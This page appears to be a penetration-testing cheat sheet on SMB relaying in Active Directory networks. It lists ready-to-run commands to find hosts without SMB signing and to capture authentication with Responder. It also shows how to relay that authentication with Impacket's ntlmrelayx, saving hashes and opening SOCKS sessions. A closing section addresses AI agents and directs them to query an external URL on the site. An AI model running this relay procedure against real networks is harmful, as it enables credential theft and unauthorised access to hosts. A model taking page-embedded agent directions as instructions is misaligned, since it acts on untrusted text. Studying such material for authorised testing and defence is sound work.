# SMB Relaying

After observing LLMNR and/or NBT-NS traffic with Responder and forcing the client to authenticate to your machine, it is possible for the attacker to relay the Net-NTLMv2 hash obtained to all systems within scope that have SMB Signing Disabled. 

### Identifying Systems with SMB Signing Disabled

#### RunFinger.py

Finger is included with Responder.py in the `/tools` directory. Simply run the tool against either a subnet or file and parse the results using `cut`

```bash
python3 RunFinger.py -i $subnet
```

#### CrackMapExec

A list can also easily be created with [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec):

```bash
crackmapexec smb $subnet --gen-relay-list 
```

#### Nmap

Nmap can also create a list of hosts that have SMB Signing Disabled:

```bash
nmap --script=smb-security-mode -p445 $ip
```

### SMB Relaying 101

After confirming LLMNR/NBT-NS traffic and identifying systems with SMB Signing Disabled, we are ready to perform the attack. First, we need modify the `Responder.conf` file and disable both SMB and HTTP:

```python
# responder.conf

SQL = On
SMB = Off    
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
```

We can then run Responder:

```bash
responder -I eth0 -dwP
```

We can then run `ntlmrelayx.py` from Impacket, supplying our file of hosts previously identified to have SMB Signing Disabled.

```bash
# Example generic relaying
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support

# Save hashes from relaying locally
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support -of
```

#### Relaying with SOCKS

We can also enable SOCKS support while relaying for interactive sessions. Using this flag will also provide you with a session on the host if the user is not a local administrator:

```bash
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support --socks
```

### References

{% embed url="<https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html>" %}

{% embed url="<https://luemmelsec.github.io/Relaying-101/#ntlm-downgrade-attack>" %}

{% embed url="<https://en.hackndo.com/ntlm-relay>" %}

{% embed url="<https://docs.microsoft.com/en-us/archive/blogs/josebda/the-basics-of-smb-signing-covering-both-smb1-and-smb2>" %}

{% embed url="<https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/exploitation/exploit-without-account/smb-relay>" %}

{% embed url="<https://www.secureauth.com/blog/playing-with-relayed-credentials/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/relaying/smb-relaying.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.